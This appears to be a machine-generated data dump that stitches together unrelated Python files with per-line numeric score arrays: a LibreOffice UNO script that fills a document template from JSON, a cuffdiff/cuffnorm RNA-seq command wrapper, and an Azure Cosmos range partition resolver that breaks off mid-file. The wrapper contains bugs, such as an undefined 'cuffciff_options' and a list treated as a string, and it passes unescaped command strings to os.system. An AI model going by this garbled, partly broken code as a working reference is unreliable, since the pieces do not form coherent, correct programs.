D:\Distr\program\Python\My-Project\rununo.py все будет работать на питоне встроенном в libreoffice (3.3.5). """ import os, sys, json print("debug0") # добавляем каталог модуля libreoffice-uno (не обязательно) lib_uno = os.path.abspath(os.path.join("C:/Program Files (x86)/LibreOffice 5/program/")) sys.path.append(lib_uno) print("debug0.1") import uno # модуль libreoffice-uno print("debug0.2") #import unohelper #import socket print("debug1") ############# libreoffice UNO ctx = uno.getComponentContext() service_manager = ctx.getServiceManager() # Конфиги url = "file:///C:/Users/langer/script/LO_REPORT/rununo/" file = "myfile.odt" new_file = "new_myfile.odt" host = "localhost" port = 2002 print("debug2") resolver = ctx.ServiceManager.createInstanceWithContext("com.sun.star.bridge.UnoUrlResolver", ctx) context = resolver.resolve("uno:socket,host="+ str(host) +",port="+ str(port) +";urp;StarOffice.ComponentContext") desktop = context.ServiceManager.createInstanceWithContext("com.sun.star.frame.Desktop", ctx) document = desktop.loadComponentFromURL(url+file, "_blank", 0, ()) replace_desc = document.createReplaceDescriptor() print("debug3") def replaceText(key, value): replace_desc.setSearchString("{{"+str(key)+"}}") # Текст для замены {{text}} print("Передано в UNO: ",key, value) # отладка find_iter = document.findFirst(replace_desc) while find_iter: find_iter.String = str(value) # в виде строки find_iter = document.findNext(find_iter.End, replace_desc) # заменяем текст if not find_iter: break # текст заменен print("debug4") #document.dispose() ############# end UNO ############# Парсим json out_parameter = """ { "template": "myfile.odt", "outformat": "docx", "text": { "name": "Иванов Иван Иванович", "age": 30, "keywords": [ "human", "developer" ] }, "placeholder": { "name": "Иванов Иван Иванович", "age": 30, "keywords": [ "human", "developer" ] }, "input": { "name": "Иванов Иван Иванович", "age": 30, "keywords": [ "human", "developer" ] }, "userfield": { "name": "Иванов Иван Иванович", "age": 30, "keywords": [ "human", "developer" ] } } """ print("debug5") try: decoded = json.loads(out_parameter) text_json = decoded['text'] # замена текста placeholder_json = decoded['placeholder'] # заполнение плейсхолдеров input_json = decoded['input'] # заполнение инпутов userfield_json = decoded['userfield'] # заполнение узерфилдов #print ("JSON parsing example: ", decoded) # вытаскиваем ключи и значения из блока 'text' for key, value in text_json.items(): #print (key,": ", value) # ф-ция замены текста replaceText(key, value) # сохранить документ document.storeAsURL(url+new_file,()) print("Сохранено в ",url+new_file ) # не удалось распарсить json except (ValueError, KeyError, TypeError): print ("Ошибка: JSON format error") ############# end json sys.exit()
[ "#!/usr/bin/python3\n", "# http://stackoverflow.com/questions/7783678/remote-control-or-script-open-office-to-edit-word-document-from-python\n", "# установить пакет libreoffice-librelogo\n", "# запускать от python3 ./script.py; установщик пакетов python3-pip, зпускать как pip3\n", "# soffice.exe \"-accept=socket,host=localhost,port=2002;urp;\" -writer -headless &\n", "# Для Windows - питон встроен в Libreoffice !!!\n", "# set path=\"C:\\Program Files\\LibreOffice 5\\program\"\n", "# set path=\"C:\\Program Files (x86)\\LibreOffice5\\program\"\n", "# перейти в cd \"C:\\Program Files (x86)\\LibreOffice5\\program\" и выполнить python D:\\Distr\\program\\Python\\My-Project\\rununo.py\n", "# http://lucasmanual.com/mywiki/OpenOffice#Modifyingtext\n", "# Джанго http://davidmburke.com/2010/09/21/django-and-openoffice-org-uno-reports/\n", "\"\"\"\n", "Открыть консоль в каталоге \"C:\\Program Files (x86)\\LibreOffice 5\\program\"\n", "запускать скрипты оттуда:\n", "C:\\Program Files (x86)\\LibreOffice 5\\program>python D:\\Distr\\program\\Python\\My-Project\\oracle.py\n", "C:\\Program Files (x86)\\LibreOffice 5\\program>python D:\\Distr\\program\\Python\\My-Project\\rununo.py\n", "все будет работать на питоне встроенном в libreoffice (3.3.5).\n", "\"\"\"\n", "\n", "import os, sys, json\n", "print(\"debug0\")\n", "# добавляем каталог модуля libreoffice-uno (не обязательно)\n", "lib_uno = os.path.abspath(os.path.join(\"C:/Program Files (x86)/LibreOffice 5/program/\"))\n", "sys.path.append(lib_uno)\n", "print(\"debug0.1\")\n", "import uno # модуль libreoffice-uno\n", "print(\"debug0.2\")\n", "#import unohelper\n", "#import socket\n", " \n", "print(\"debug1\")\n", " \n", "############# libreoffice UNO\n", "ctx = uno.getComponentContext()\n", "service_manager = ctx.getServiceManager() \n", "\n", "# Конфиги\n", "url = \"file:///C:/Users/langer/script/LO_REPORT/rununo/\"\n", "file = \"myfile.odt\"\n", "new_file = \"new_myfile.odt\"\n", "host = \"localhost\"\n", "port = 2002\n", "\n", "print(\"debug2\")\n", "\n", "resolver = ctx.ServiceManager.createInstanceWithContext(\"com.sun.star.bridge.UnoUrlResolver\", ctx)\n", "context = resolver.resolve(\"uno:socket,host=\"+ str(host) +\",port=\"+ str(port) +\";urp;StarOffice.ComponentContext\")\n", "desktop = context.ServiceManager.createInstanceWithContext(\"com.sun.star.frame.Desktop\", ctx)\n", "document = desktop.loadComponentFromURL(url+file, \"_blank\", 0, ())\n", "\n", "replace_desc = document.createReplaceDescriptor() \n", "\n", "print(\"debug3\")\n", "\n", "def replaceText(key, value):\n", " replace_desc.setSearchString(\"{{\"+str(key)+\"}}\") # Текст для замены {{text}}\n", " print(\"Передано в UNO: \",key, value) # отладка\n", "\n", " find_iter = document.findFirst(replace_desc)\n", " while find_iter:\n", " find_iter.String = str(value) # в виде строки\n", " find_iter = document.findNext(find_iter.End, replace_desc) # заменяем текст\n", " if not find_iter: break # текст заменен\n", "\n", "print(\"debug4\")\n", " \n", " #document.dispose()\n", "############# end UNO\n", " \n", "\n", "############# Парсим json\n", "out_parameter = \"\"\"\n", "{\n", " \"template\": \"myfile.odt\",\n", " \"outformat\": \"docx\",\n", " \"text\": {\n", " \"name\": \"Иванов Иван Иванович\",\n", " \"age\": 30,\n", " \"keywords\": [ \"human\", \"developer\" ]\n", " },\n", " \"placeholder\": {\n", " \"name\": \"Иванов Иван Иванович\",\n", " \"age\": 30,\n", " \"keywords\": [ \"human\", \"developer\" ]\n", " },\n", " \"input\": {\n", " \"name\": \"Иванов Иван Иванович\",\n", " \"age\": 30,\n", " \"keywords\": [ \"human\", \"developer\" ]\n", " },\n", " \"userfield\": {\n", " \"name\": \"Иванов Иван Иванович\",\n", " \"age\": 30,\n", " \"keywords\": [ \"human\", \"developer\" ]\n", " }\n", "}\n", "\"\"\"\n", "\n", "print(\"debug5\")\n", "\n", "try:\n", " decoded = json.loads(out_parameter)\n", " text_json = decoded['text'] # замена текста\n", " placeholder_json = decoded['placeholder'] # заполнение плейсхолдеров\n", " input_json = decoded['input'] # заполнение инпутов\n", " userfield_json = decoded['userfield'] # заполнение узерфилдов\n", " #print (\"JSON parsing example: \", decoded)\n", " \n", " # вытаскиваем ключи и значения из блока 'text' \n", " for key, value in text_json.items():\n", " #print (key,\": \", value)\n", " \n", " # ф-ция замены текста\n", " replaceText(key, value)\n", " \n", " # сохранить документ\n", " document.storeAsURL(url+new_file,())\n", " print(\"Сохранено в \",url+new_file )\n", " \n", "\n", "# не удалось распарсить json\n", "except (ValueError, KeyError, TypeError):\n", " print (\"Ошибка: JSON format error\")\n", "############# end json\n", "\n", "\n", "\n", "sys.exit()\n" ]
[ 0, 0, 0, 0.011627906976744186, 0.012345679012345678, 0, 0, 0, 0.008, 0, 0.012195121951219513, 0, 0.04054054054054054, 0, 0.09278350515463918, 0.08247422680412371, 0, 0, 0, 0.047619047619047616, 0, 0, 0.011235955056179775, 0, 0, 0.05555555555555555, 0, 0.05555555555555555, 0.06666666666666667, 0.25, 0, 0.25, 0.03333333333333333, 0, 0.023255813953488372, 0, 0, 0.016129032258064516, 0.041666666666666664, 0, 0.043478260869565216, 0.0625, 0, 0, 0, 0.010101010101010102, 0.043478260869565216, 0.010638297872340425, 0, 0, 0.0196078431372549, 0, 0, 0, 0.034482758620689655, 0.024691358024691357, 0.0392156862745098, 0, 0, 0, 0.018518518518518517, 0.023809523809523808, 0.041666666666666664, 0, 0.0625, 0.1111111111111111, 0.08333333333333333, 0.045454545454545456, 0.5, 0, 0.037037037037037035, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.016129032258064516, 0.0136986301369863, 0.014925373134328358, 0.014285714285714285, 0.02127659574468085, 0.2, 0.01818181818181818, 0, 0.06451612903225806, 0.14285714285714285, 0.03571428571428571, 0.03333333333333333, 0.14285714285714285, 0, 0.024390243902439025, 0.05, 0.14285714285714285, 0, 0, 0, 0.025, 0.043478260869565216, 0, 0, 0, 0.09090909090909091 ]
128
0.026695
false
from pandas import read_table import os def load_cuffdiff(filename): if os.path.isdir(filename): filename = os.path.join(filename, "isoform_exp.diff") table = read_table(filename, index_col="test_id", true_values=["yes"], false_values=["no"]) table = table.rename(columns={"log2(fold_change)": "fold_change"}) return table def run_cuffdiff(samples_dir_1,samples_dir_2,sample_name_1,sample_name_2,organism,output_dir, cuffdiff='cuffdiff',indexes_dir='../indexes/', threads = 1, library_norm_method = 'quartile', fdr = 0.05, library_type ='fr-firststrand', index_type='.gtf', more_options=None): '''Run cuffdiff from the commandline Input: samples_dir_1 = list of sample directories for each replicate in sample 1 samples_dir_2 = list of sample directories for each replicate in sample 2 samples_name_1 = sample name for sample 1 samples_name_1 = sample name for sample 2 organism = organism name output_dir = directory of cuffdiff output cuffdiff = string to run cuffdiff (give the absolute directory of cuffdiff.exe if cuffdiff is not in PATH) indexes_dir = directory where indexes are located library_type = string indicating the library type (e.g. fr-first-strand) more_options = other options not specified (e.g. '--library-type fr-firststrand) Output: Example usage: directories for this example: /home/douglas/Documents/RNA_sequencing/fastq /home/douglas/Documents/RNA_sequencing/fastq/140818_11_OxicEvo04EcoliGlcM9_Broth-4 (sample 1 .bam file locations) /home/douglas/Documents/RNA_sequencing/fastq/140716_0_OxicEvo04pgiEcoliGlcM9_Broth-1 (sample 2 .bam file locations) /home/douglas/Documents/RNA_sequencing/indexes (.gtf file location) /home/douglas/Documents/RNA_sequencing/fastq/ (output directory) at the terminal: cd /home/douglas/Documents/RNA_sequencing/fastq python3 at the python command line: from resequencing_utilities.cuffdiff import run_cuffdiff run_cuffdiff(['/home/douglas/Documents/RNA_sequencing/fastq/140818_11_OxicEvo04EcoliGlcM9_Broth-4/140818_11_OxicEvo04EcoliGlcM9_Broth-4.bam'], ['/home/douglas/Documents/RNA_sequencing/fastq/140716_0_OxicEvo04pgiEcoliGlcM9_Broth-1/140716_0_OxicEvo04pgiEcoliGlcM9_Broth-1.bam'], '140818_11_OxicEvo04EcoliGlcM9_Broth-4','140716_0_OxicEvo04pgiEcoliGlcM9_Broth-1', 'ecoli_mg1655', '/home/douglas/Documents/RNA_sequencing/fastq/', threads = 48) ''' # parse input into string values sample_1=','.join(samples_dir_1); sample_2=','.join(samples_dir_2); if index_type in ['.gtf','.gff']: gff_index = indexes_dir + organism + index_type else: print('index_type not recognized.') cuffdiff_options = "--library-type %s --library-norm-method %s --FDR %s --num-threads %s" % \ (library_type,library_norm_method,fdr,threads); if more_options: cuffdiff_options = cuffciff_options + ' ' + more_options; samples_message = sample_name_1 + "_vs_" + sample_name_2; # make the cuffdiff_command #cuffdiff [options] <transcripts.gtf> <sample1_replicate1.bam,...> <sample2_replicate1.bam,...> cuffdiff_command = "%s %s -o %s -L %s,%s %s %s %s " % \ (cuffdiff, cuffdiff_options, output_dir, sample_name_1,sample_name_2,gff_index, sample_1,sample_2); # execute the command print(cuffdiff_command) os.system(cuffdiff_command) def run_cuffnorm(samples_dirs,samples_names,organism,output_dir, cuffnorm='cuffnorm',indexes_dir='../indexes/', threads = 1, library_norm_method = 'quartile', library_type ='fr-firststrand', index_type='.gtf', more_options=None): '''Run cuffnorm from the commandline Input: samples_dirs = list of strings of sample directories for each replicate in samples 1-N use "," to seperate replicates per sample use "|" to seperate lists of replicates where sample_dirs = s1-r1,s1-r2,s1-r3,...|s2-r1,s2-r2,s2-r3,...|...|sN-r1,sN-r2,sN-r3,... samples_names = sample name for sample 1-N s1,s2,...,sN,... organism = organism name output_dir = directory of cuffnorm output cuffnorm = string to run cuffnorm (give the absolute directory of cuffnorm.exe if cuffnorm is not in PATH) indexes_dir = directory where indexes are located library_type = string indicating the library type (e.g. fr-first-strand) index_type = string indicating the index file extention (e.g. '.gtf' or '.gff') more_options = other options not specified (e.g. '--library-type fr-firststrand) Output: Example usage: directories for this example: /home/douglas/Documents/RNA_sequencing/fastq /home/douglas/Documents/RNA_sequencing/fastq/140818_11_OxicEvo04EcoliGlcM9_Broth-4 (sample 1 .bam file locations) /home/douglas/Documents/RNA_sequencing/fastq/140716_0_OxicEvo04pgiEcoliGlcM9_Broth-1 (sample 2 .bam file locations) /home/douglas/Documents/RNA_sequencing/indexes (.gtf file location) /home/douglas/Documents/RNA_sequencing/fastq/ (output directory) at the terminal: cd /home/douglas/Documents/RNA_sequencing/fastq python3 at the python command line: from resequencing_utilities.cuffdiff import run_cuffnorm run_cuffnorm( '/home/douglas/Documents/RNA_sequencing/fastq/140818_11_OxicEvo04EcoliGlcM9_Broth-4/140818_11_OxicEvo04EcoliGlcM9_Broth-4.bam,\ /home/douglas/Documents/RNA_sequencing/fastq/140716_0_OxicEvo04pgiEcoliGlcM9_Broth-1/140716_0_OxicEvo04pgiEcoliGlcM9_Broth-1.bam', '140818_11_OxicEvo04EcoliGlcM9_Broth-4,140716_0_OxicEvo04pgiEcoliGlcM9_Broth-1', 'ecoli_mg1655', '/home/douglas/Documents/RNA_sequencing/fastq/', threads = 48) NOTES: I apologize in advance for the use of strings to specify sample_dirs/sample_names strings are used to avoid errors when pass the arguments in at the command line ''' # parse input into string values sample_1 = []; for sdir in samples_dirs: sample_tmp=','.join(sdir); sample_1.append(sample_tmp); if index_type in ['.gtf','.gff']: gff_index = indexes_dir + organism + index_type else: print('index_type not recognized.') cuffnorm_options = "--library-type %s --library-norm-method %s --num-threads %s" % \ (library_type,library_norm_method,threads); if more_options: cuffnorm_options = cuffciff_options + ' ' + more_options; cuffnorm_L = samples_names; cuffnorm_samples_1 = samples_dirs.replace("|",' '); samples_message = samples_names.split(",")[0] + "_to_" + samples_names.split(",")[-1] + "_cuffnorm"; # make the cuffnorm_command #cuffnorm [options] <transcripts.gtf> <sample1_replicate1.bam,...> <sample2_replicate1.bam,...> ... <sampleN_replicate1.bam,...> cuffnorm_command = "%s %s -o %s -L %s %s %s " % \ (cuffnorm, cuffnorm_options, output_dir, cuffnorm_L,gff_index, cuffnorm_samples_1); # execute the command print(cuffnorm_command) os.system(cuffnorm_command)
[ "from pandas import read_table\n", "import os\n", "\n", "def load_cuffdiff(filename):\n", " if os.path.isdir(filename):\n", " filename = os.path.join(filename, \"isoform_exp.diff\")\n", " table = read_table(filename, index_col=\"test_id\",\n", " true_values=[\"yes\"], false_values=[\"no\"])\n", " table = table.rename(columns={\"log2(fold_change)\": \"fold_change\"})\n", " \n", " return table\n", "\n", "def run_cuffdiff(samples_dir_1,samples_dir_2,sample_name_1,sample_name_2,organism,output_dir,\n", " cuffdiff='cuffdiff',indexes_dir='../indexes/', threads = 1,\n", " library_norm_method = 'quartile', fdr = 0.05,\n", " library_type ='fr-firststrand',\n", " index_type='.gtf',\n", " more_options=None):\n", " '''Run cuffdiff from the commandline\n", "\n", " Input:\n", " samples_dir_1 = list of sample directories for each replicate in sample 1\n", " samples_dir_2 = list of sample directories for each replicate in sample 2\n", " samples_name_1 = sample name for sample 1\n", " samples_name_1 = sample name for sample 2\n", " organism = organism name\n", " output_dir = directory of cuffdiff output\n", " cuffdiff = string to run cuffdiff (give the absolute directory of cuffdiff.exe if cuffdiff is not in PATH)\n", " indexes_dir = directory where indexes are located\n", " library_type = string indicating the library type (e.g. fr-first-strand)\n", " more_options = other options not specified (e.g. '--library-type fr-firststrand)\n", "\n", " Output:\n", " \n", " Example usage:\n", " directories for this example: \n", " /home/douglas/Documents/RNA_sequencing/fastq\n", " /home/douglas/Documents/RNA_sequencing/fastq/140818_11_OxicEvo04EcoliGlcM9_Broth-4 (sample 1 .bam file locations)\n", " /home/douglas/Documents/RNA_sequencing/fastq/140716_0_OxicEvo04pgiEcoliGlcM9_Broth-1 (sample 2 .bam file locations)\n", " /home/douglas/Documents/RNA_sequencing/indexes (.gtf file location)\n", " /home/douglas/Documents/RNA_sequencing/fastq/ (output directory) \n", " \n", " at the terminal:\n", " cd /home/douglas/Documents/RNA_sequencing/fastq\n", " python3\n", "\n", " at the python command line:\n", " from resequencing_utilities.cuffdiff import run_cuffdiff\n", " run_cuffdiff(['/home/douglas/Documents/RNA_sequencing/fastq/140818_11_OxicEvo04EcoliGlcM9_Broth-4/140818_11_OxicEvo04EcoliGlcM9_Broth-4.bam'],\n", " ['/home/douglas/Documents/RNA_sequencing/fastq/140716_0_OxicEvo04pgiEcoliGlcM9_Broth-1/140716_0_OxicEvo04pgiEcoliGlcM9_Broth-1.bam'],\n", " '140818_11_OxicEvo04EcoliGlcM9_Broth-4','140716_0_OxicEvo04pgiEcoliGlcM9_Broth-1',\n", " 'ecoli_mg1655',\n", " '/home/douglas/Documents/RNA_sequencing/fastq/',\n", " threads = 48)\n", "\n", " '''\n", " \n", " # parse input into string values\n", " sample_1=','.join(samples_dir_1);\n", " sample_2=','.join(samples_dir_2);\n", " \n", " if index_type in ['.gtf','.gff']:\n", " gff_index = indexes_dir + organism + index_type\n", " else:\n", " print('index_type not recognized.')\n", "\n", " cuffdiff_options = \"--library-type %s --library-norm-method %s --FDR %s --num-threads %s\" % \\\n", " (library_type,library_norm_method,fdr,threads);\n", " if more_options:\n", " cuffdiff_options = cuffciff_options + ' ' + more_options;\n", "\n", " samples_message = sample_name_1 + \"_vs_\" + sample_name_2;\n", "\n", " # make the cuffdiff_command\n", " #cuffdiff [options] <transcripts.gtf> <sample1_replicate1.bam,...> <sample2_replicate1.bam,...> \n", " cuffdiff_command = \"%s %s -o %s -L %s,%s %s %s %s \" % \\\n", " (cuffdiff, cuffdiff_options, output_dir, sample_name_1,sample_name_2,gff_index, sample_1,sample_2);\n", "\n", " # execute the command\n", " print(cuffdiff_command)\n", " os.system(cuffdiff_command)\n", "\n", "def run_cuffnorm(samples_dirs,samples_names,organism,output_dir,\n", " cuffnorm='cuffnorm',indexes_dir='../indexes/', threads = 1,\n", " library_norm_method = 'quartile',\n", " library_type ='fr-firststrand',\n", " index_type='.gtf',\n", " more_options=None):\n", " '''Run cuffnorm from the commandline\n", "\n", " Input:\n", " samples_dirs = list of strings of sample directories for each replicate in samples 1-N\n", " use \",\" to seperate replicates per sample\n", " use \"|\" to seperate lists of replicates\n", " where sample_dirs = s1-r1,s1-r2,s1-r3,...|s2-r1,s2-r2,s2-r3,...|...|sN-r1,sN-r2,sN-r3,...\n", " samples_names = sample name for sample 1-N\n", " s1,s2,...,sN,...\n", " organism = organism name\n", " output_dir = directory of cuffnorm output\n", " cuffnorm = string to run cuffnorm (give the absolute directory of cuffnorm.exe if cuffnorm is not in PATH)\n", " indexes_dir = directory where indexes are located\n", " library_type = string indicating the library type (e.g. fr-first-strand)\n", " index_type = string indicating the index file extention (e.g. '.gtf' or '.gff')\n", " more_options = other options not specified (e.g. '--library-type fr-firststrand)\n", "\n", " Output:\n", " \n", " Example usage:\n", " directories for this example: \n", " /home/douglas/Documents/RNA_sequencing/fastq\n", " /home/douglas/Documents/RNA_sequencing/fastq/140818_11_OxicEvo04EcoliGlcM9_Broth-4 (sample 1 .bam file locations)\n", " /home/douglas/Documents/RNA_sequencing/fastq/140716_0_OxicEvo04pgiEcoliGlcM9_Broth-1 (sample 2 .bam file locations)\n", " /home/douglas/Documents/RNA_sequencing/indexes (.gtf file location)\n", " /home/douglas/Documents/RNA_sequencing/fastq/ (output directory) \n", " \n", " at the terminal:\n", " cd /home/douglas/Documents/RNA_sequencing/fastq\n", " python3\n", "\n", " at the python command line:\n", " from resequencing_utilities.cuffdiff import run_cuffnorm\n", " run_cuffnorm(\n", " '/home/douglas/Documents/RNA_sequencing/fastq/140818_11_OxicEvo04EcoliGlcM9_Broth-4/140818_11_OxicEvo04EcoliGlcM9_Broth-4.bam,\\\n", " /home/douglas/Documents/RNA_sequencing/fastq/140716_0_OxicEvo04pgiEcoliGlcM9_Broth-1/140716_0_OxicEvo04pgiEcoliGlcM9_Broth-1.bam',\n", " '140818_11_OxicEvo04EcoliGlcM9_Broth-4,140716_0_OxicEvo04pgiEcoliGlcM9_Broth-1',\n", " 'ecoli_mg1655',\n", " '/home/douglas/Documents/RNA_sequencing/fastq/',\n", " threads = 48)\n", "\n", " NOTES:\n", " I apologize in advance for the use of strings to specify sample_dirs/sample_names\n", " strings are used to avoid errors when pass the arguments in at the command line\n", "\n", " '''\n", " \n", " # parse input into string values\n", " sample_1 = [];\n", " for sdir in samples_dirs:\n", " sample_tmp=','.join(sdir);\n", " sample_1.append(sample_tmp);\n", " \n", " if index_type in ['.gtf','.gff']:\n", " gff_index = indexes_dir + organism + index_type\n", " else:\n", " print('index_type not recognized.')\n", "\n", " cuffnorm_options = \"--library-type %s --library-norm-method %s --num-threads %s\" % \\\n", " (library_type,library_norm_method,threads);\n", " if more_options:\n", " cuffnorm_options = cuffciff_options + ' ' + more_options;\n", " cuffnorm_L = samples_names;\n", " cuffnorm_samples_1 = samples_dirs.replace(\"|\",' ');\n", "\n", " samples_message = samples_names.split(\",\")[0] + \"_to_\" + samples_names.split(\",\")[-1] + \"_cuffnorm\";\n", "\n", " # make the cuffnorm_command\n", " #cuffnorm [options] <transcripts.gtf> <sample1_replicate1.bam,...> <sample2_replicate1.bam,...> ... <sampleN_replicate1.bam,...>\n", " cuffnorm_command = \"%s %s -o %s -L %s %s %s \" % \\\n", " (cuffnorm, cuffnorm_options, output_dir, cuffnorm_L,gff_index, cuffnorm_samples_1);\n", "\n", " # execute the command\n", " print(cuffnorm_command)\n", " os.system(cuffnorm_command)" ]
[ 0, 0, 0, 0.034482758620689655, 0, 0, 0, 0.02, 0, 0.2, 0, 0, 0.07446808510638298, 0.05063291139240506, 0.07692307692307693, 0.0392156862745098, 0.02631578947368421, 0.02564102564102564, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.009009009009009009, 0, 0, 0.011764705882352941, 0, 0, 0.2, 0, 0.02857142857142857, 0, 0.008064516129032258, 0.007936507936507936, 0, 0.013157894736842105, 0.2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.2, 0, 0.05263157894736842, 0.05263157894736842, 0.2, 0.02631578947368421, 0, 0, 0, 0, 0.01020408163265306, 0.07142857142857142, 0, 0.015151515151515152, 0, 0.016129032258064516, 0, 0, 0.0297029702970297, 0, 0.046296296296296294, 0, 0, 0, 0, 0, 0.06153846153846154, 0.05063291139240506, 0.05660377358490566, 0.0392156862745098, 0.02631578947368421, 0.02564102564102564, 0, 0, 0, 0.01098901098901099, 0, 0, 0.01020408163265306, 0, 0, 0, 0, 0.009009009009009009, 0, 0, 0.011904761904761904, 0.011764705882352941, 0, 0, 0.2, 0, 0.02857142857142857, 0, 0.008064516129032258, 0.007936507936507936, 0, 0.013157894736842105, 0.2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.011627906976744186, 0.011904761904761904, 0, 0, 0.2, 0, 0.05263157894736842, 0, 0.05714285714285714, 0.02702702702702703, 0.1111111111111111, 0.02631578947368421, 0, 0, 0, 0, 0.011235955056179775, 0.057692307692307696, 0, 0.015151515151515152, 0.03125, 0.03571428571428571, 0, 0.01904761904761905, 0, 0, 0.015037593984962405, 0, 0.03260869565217391, 0, 0, 0, 0.03225806451612903 ]
163
0.020037
false
#The MIT License (MIT) #Copyright (c) 2014 Microsoft Corporation #Permission is hereby granted, free of charge, to any person obtaining a copy #of this software and associated documentation files (the "Software"), to deal #in the Software without restriction, including without limitation the rights #to use, copy, modify, merge, publish, distribute, sublicense, and/or sell #copies of the Software, and to permit persons to whom the Software is #furnished to do so, subject to the following conditions: #The above copyright notice and this permission notice shall be included in all #copies or substantial portions of the Software. #THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR #IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, #FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE #AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER #LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, #OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE #SOFTWARE. """Range partition resolver implementation in the Azure Cosmos database service. """ import azure.cosmos.range as prange class RangePartitionResolver(object): """RangePartitionResolver implements partitioning based on the ranges, allowing you to distribute requests and data across a number of partitions. """ def __init__(self, partition_key_extractor, partition_map): """ :param lambda partition_key_extractor: Returning the partition key from the document passed. :param dict partition_map: The dictionary of ranges mapped to their associated collection """ if partition_key_extractor is None: raise ValueError("partition_key_extractor is None.") if partition_map is None: raise ValueError("partition_map is None.") self.partition_key_extractor = partition_key_extractor self.partition_map = partition_map def ResolveForCreate(self, document): """Resolves the collection for creating the document based on the partition key. :param dict document: The document to be created. :return: Collection Self link or Name based link which should handle the Create operation. :rtype: str """ if document is None: raise ValueError("document is None.") partition_key = self.partition_key_extractor(document) containing_range = self._GetContainingRange(partition_key) if containing_range is None: raise ValueError("A containing range for " + str(partition_key) + " doesn't exist in the partition map.") return self.partition_map.get(containing_range) def ResolveForRead(self, partition_key): """Resolves the collection for reading/querying the documents based on the partition key. :param dict document: The document to be read/queried. :return: Collection Self link(s) or Name based link(s) which should handle the Read operation. :rtype: list """ intersecting_ranges = self._GetIntersectingRanges(partition_key) collection_links = list() for keyrange in intersecting_ranges: collection_links.append(self.partition_map.get(keyrange)) return collection_links def _GetContainingRange(self, partition_key): """Gets the containing range based on the partition key. """ for keyrange in self.partition_map.keys(): if keyrange.Contains(partition_key): return keyrange return None def _GetIntersectingRanges(self, partition_key): """Gets the intersecting ranges based on the partition key. """ partitionkey_ranges = set() intersecting_ranges = set() if partition_key is None: return list(self.partition_map.keys()) if isinstance(partition_key, prange.Range): partitionkey_ranges.add(partition_key) elif isinstance(partition_key, list): for key in partition_key: if key is None: return list(self.partition_map.keys()) elif isinstance(key, prange.Range): partitionkey_ranges.add(key) else: partitionkey_ranges.add(prange.Range(key, key)) else: partitionkey_ranges.add(prange.Range(partition_key, partition_key)) for partitionKeyRange in partitionkey_ranges: for keyrange in self.partition_map.keys(): if keyrange.Intersect(partitionKeyRange): intersecting_ranges.add(keyrange) return intersecting_ranges
[ "#The MIT License (MIT)\n", "#Copyright (c) 2014 Microsoft Corporation\n", "\n", "#Permission is hereby granted, free of charge, to any person obtaining a copy\n", "#of this software and associated documentation files (the \"Software\"), to deal\n", "#in the Software without restriction, including without limitation the rights\n", "#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n", "#copies of the Software, and to permit persons to whom the Software is\n", "#furnished to do so, subject to the following conditions:\n", "\n", "#The above copyright notice and this permission notice shall be included in all\n", "#copies or substantial portions of the Software.\n", "\n", "#THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n", "#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n", "#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n", "#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n", "#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n", "#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n", "#SOFTWARE.\n", "\n", "\"\"\"Range partition resolver implementation in the Azure Cosmos database service.\n", "\"\"\"\n", "\n", "import azure.cosmos.range as prange\n", "\n", "class RangePartitionResolver(object):\n", " \"\"\"RangePartitionResolver implements partitioning based on the ranges, allowing you to\n", " distribute requests and data across a number of partitions.\n", " \"\"\"\n", " def __init__(self, partition_key_extractor, partition_map):\n", " \"\"\"\n", " :param lambda partition_key_extractor:\n", " Returning the partition key from the document passed.\n", " :param dict partition_map:\n", " The dictionary of ranges mapped to their associated collection\n", " \"\"\"\n", " if partition_key_extractor is None:\n", " raise ValueError(\"partition_key_extractor is None.\")\n", " if partition_map is None:\n", " raise ValueError(\"partition_map is None.\")\n", "\n", " self.partition_key_extractor = partition_key_extractor\n", " self.partition_map = partition_map\n", "\n", " def ResolveForCreate(self, document):\n", " \"\"\"Resolves the collection for creating the document based on the partition key.\n", "\n", " :param dict document:\n", " The document to be created.\n", "\n", " :return:\n", " Collection Self link or Name based link which should handle the Create operation.\n", " :rtype:\n", " str\n", " \"\"\"\n", " if document is None:\n", " raise ValueError(\"document is None.\")\n", "\n", " partition_key = self.partition_key_extractor(document)\n", " containing_range = self._GetContainingRange(partition_key)\n", " \n", " if containing_range is None:\n", " raise ValueError(\"A containing range for \" + str(partition_key) + \" doesn't exist in the partition map.\")\n", " \n", " return self.partition_map.get(containing_range)\n", "\n", " def ResolveForRead(self, partition_key):\n", " \"\"\"Resolves the collection for reading/querying the documents based on the partition key.\n", "\n", " :param dict document:\n", " The document to be read/queried.\n", "\n", " :return:\n", " Collection Self link(s) or Name based link(s) which should handle the Read operation.\n", " :rtype:\n", " list\n", " \"\"\"\n", " intersecting_ranges = self._GetIntersectingRanges(partition_key)\n", "\n", " collection_links = list()\n", " for keyrange in intersecting_ranges:\n", " collection_links.append(self.partition_map.get(keyrange))\n", "\n", " return collection_links\n", "\n", " def _GetContainingRange(self, partition_key):\n", " \"\"\"Gets the containing range based on the partition key.\n", " 